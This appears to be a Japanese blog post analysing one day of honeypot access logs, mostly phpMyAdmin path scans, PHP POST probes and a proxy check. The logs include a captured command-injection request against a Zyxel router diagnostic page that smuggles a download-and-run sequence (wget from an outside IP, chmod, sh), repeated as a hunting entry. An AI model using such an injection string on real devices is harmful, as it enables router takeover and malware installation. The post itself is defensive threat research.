S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/08/04)

ハニーポットのログ分析(2018/08/04)

honeypot

もう日数はいいかなと思い、タイトル変えてみました。
WOWhoneypotの2018/08/04(土) (運用62日目)の簡易分析です。
本日の総アクセス件数は 110件です。以下が全アクセスログです。

21 2018-08-04 GET /
2 2018-08-04 GET /xampp/phpmyadmin/index.php
2 2018-08-04 GET /www/phpMyAdmin/index.php
2 2018-08-04 GET /tools/phpMyAdmin/index.php
2 2018-08-04 GET /pmd/index.php
2 2018-08-04 GET /pma-old/index.php
2 2018-08-04 GET /pmamy2/index.php
2 2018-08-04 GET /pma/index.php
2 2018-08-04 GET /PMA2/index.php
2 2018-08-04 GET /phpmyadmin/phpmyadmin/index.php
2 2018-08-04 GET /phpMyAdmin.old/index.php
2 2018-08-04 GET /phpmyadmin-old/index.php
2 2018-08-04 GET /phpMyAdmin/index.php
2 2018-08-04 GET /phpmyadmin/index.php
2 2018-08-04 GET /phpMyadmin_bak/index.php
2 2018-08-04 GET /phpmyadmin2/index.php
2 2018-08-04 GET /phpmyadmin1/index.php
2 2018-08-04 GET /phpmyadmin0/index.php
2 2018-08-04 GET /phpma/index.php
2 2018-08-04 GET /phpadmin/index.php
2 2018-08-04 GET /mysqladmin/index.php
2 2018-08-04 GET /mysql-admin/index.php
2 2018-08-04 GET /myadmin/index.php
2 2018-08-04 GET /myadmin2/index.php
2 2018-08-04 GET /db/index.php
2 2018-08-04 GET /claroline/phpMyAdmin/index.php
2 2018-08-04 GET /admin/PMA/index.php
2 2018-08-04 GET /admin/phpMyAdmin/index.php
2 2018-08-04 GET /admin/phpmyadmin/index.php
2 2018-08-04 GET /admin/phpmyadmin2/index.php
2 2018-08-04 GET /admin/mysql/index.php
2 2018-08-04 GET /admin/mysql2/index.php
2 2018-08-04 GET /admin/index.php
1 2018-08-04 PROPFIND /
1 2018-08-04 POST /xx.php
1 2018-08-04 POST /xw.php
1 2018-08-04 POST /wuwu11.php
1 2018-08-04 POST /w.php
1 2018-08-04 POST /wc.php
1 2018-08-04 POST /s.php
1 2018-08-04 POST /sheep.php
1 2018-08-04 POST /db_session.init.php
1 2018-08-04 POST /db.init.php
1 2018-08-04 GET /web/phpMyAdmin/index.php
1 2018-08-04 GET /webdav/
1 2018-08-04 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-04 GET /typo3/phpmyadmin/index.php
1 2018-08-04 GET /pma/scripts/setup.php
1 2018-08-04 GET /pmamy/index.php
1 2018-08-04 GET /phpMyAdmin/scripts/setup.php
1 2018-08-04 GET /phpmyadmin/scripts/setup.php
1 2018-08-04 GET /phpMyAdminold/index.php
1 2018-08-04 GET /MyAdmin/scripts/setup.php
1 2018-08-04 GET /myadmin/scripts/setup.php
1 2018-08-04 GET /index.php
1 2018-08-04 GET /dbadmin/index.php
1 2018-08-04 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
1 2018-08-04 CONNECT 133.130.126[.]119:43 

phpMyAdmin関連(75件)とPeppa!(phpに対するPOST/9件)と/を除外したアクセス数です。

1 2018-08-04 GET /webdav/
1 2018-08-04 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-04 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
1 2018-08-04 CONNECT 133.130.126[.]119:43

上から
WebDAVに対する調査行為
・ZmEuによるスキャン
・Gemini/2.0によるZyxel製ルータの脆弱性を突く攻撃
・CONNECTメソッドによる不正中継の調査
と考えられます。 

 

本日のハンティングログは以下です。Gemiini/2.0のものです。

1 2018-08-04 wget hxxp://178.128.11[.]199/rvs

以上です。